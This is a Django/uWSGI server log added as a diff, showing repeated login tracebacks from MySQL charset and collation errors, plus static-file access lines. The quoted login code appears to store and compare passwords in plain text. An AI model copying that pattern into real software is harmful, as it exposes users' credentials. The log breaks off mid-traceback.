+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x9C\\x9F\\xE6\\x9C\\xAB...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 660/828] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:11 2021] POST /login/ => generated 209237 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 661/829] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:13 2021] POST /login/ => generated 182898 bytes in 127 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 662/830] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 08:11:14 2021] POST /login/ => generated 182898 bytes in 104 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 663/831] 219.228.146.253 () {38 vars in 865 bytes} [Thu Jan 14 08:12:49 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 2069|app: -1|req: -1/832] 219.228.146.253 () {40 vars in 865 bytes} [Thu Jan 14 08:12:49 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/833] 219.228.146.253 () {40 vars in 887 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/834] 219.228.146.253 () {40 vars in 867 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/835] 219.228.146.253 () {40 vars in 873 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/836] 219.228.146.253 () {40 vars in 869 bytes} [Thu Jan 14 08:12:50 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/837] 219.228.146.253 () {40 vars in 848 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/838] 219.228.146.253 () {40 vars in 864 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/839] 219.228.146.253 () {40 vars in 854 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/840] 219.228.146.253 () {40 vars in 846 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/841] 219.228.146.253 () {40 vars in 862 bytes} [Thu Jan 14 08:12:50 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 2069|app: -1|req: -1/842] 219.228.146.253 () {40 vars in 908 bytes} [Thu Jan 14 08:12:50 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE5\\xB9\\xB2\\xE9\\xA5\\xAD...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 664/843] 219.228.146.253 () {48 vars in 1009 bytes} [Thu Jan 14 08:13:13 2021] POST /login/ => generated 209633 bytes in 122 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 2069|app: 0|req: 665/844] 101.89.239.230 () {32 vars in 545 bytes} [Thu Jan 14 08:13:55 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 666/845] 101.89.19.197 () {32 vars in 587 bytes} [Thu Jan 14 08:16:31 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 667/846] 101.91.62.89 () {32 vars in 584 bytes} [Thu Jan 14 08:16:37 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 668/847] 180.160.72.163 () {38 vars in 935 bytes} [Thu Jan 14 08:28:52 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1)
+[pid: 2069|app: 0|req: 669/848] 180.160.72.163 () {38 vars in 937 bytes} [Thu Jan 14 08:28:52 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/849] 180.160.72.163 () {40 vars in 999 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/850] 180.160.72.163 () {40 vars in 979 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/851] 180.160.72.163 () {40 vars in 981 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/852] 180.160.72.163 () {40 vars in 985 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/853] 180.160.72.163 () {40 vars in 960 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/854] 180.160.72.163 () {40 vars in 977 bytes} [Thu Jan 14 08:28:52 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/855] 180.160.72.163 () {40 vars in 958 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/856] 180.160.72.163 () {40 vars in 974 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/857] 180.160.72.163 () {40 vars in 972 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/858] 180.160.72.163 () {40 vars in 965 bytes} [Thu Jan 14 08:28:52 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 61645] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 180.160.72.163 client_port: 65229] hr_write(): Broken pipe [plugins/http/http.c line 565]
+[pid: 2069|app: 0|req: 670/859] 180.160.72.163 () {40 vars in 1025 bytes} [Thu Jan 14 08:28:58 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 2069|app: -1|req: -1/860] 180.160.72.163 () {40 vars in 976 bytes} [Thu Jan 14 08:28:58 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/861] 180.160.72.163 () {40 vars in 959 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/862] 180.160.72.163 () {40 vars in 957 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/863] 180.160.72.163 () {40 vars in 975 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/864] 180.160.72.163 () {40 vars in 973 bytes} [Thu Jan 14 08:28:58 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/865] 180.160.72.163 () {40 vars in 1061 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/866] 180.160.72.163 () {40 vars in 1055 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 2069|app: -1|req: -1/867] 180.160.72.163 () {40 vars in 1029 bytes} [Thu Jan 14 08:29:01 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
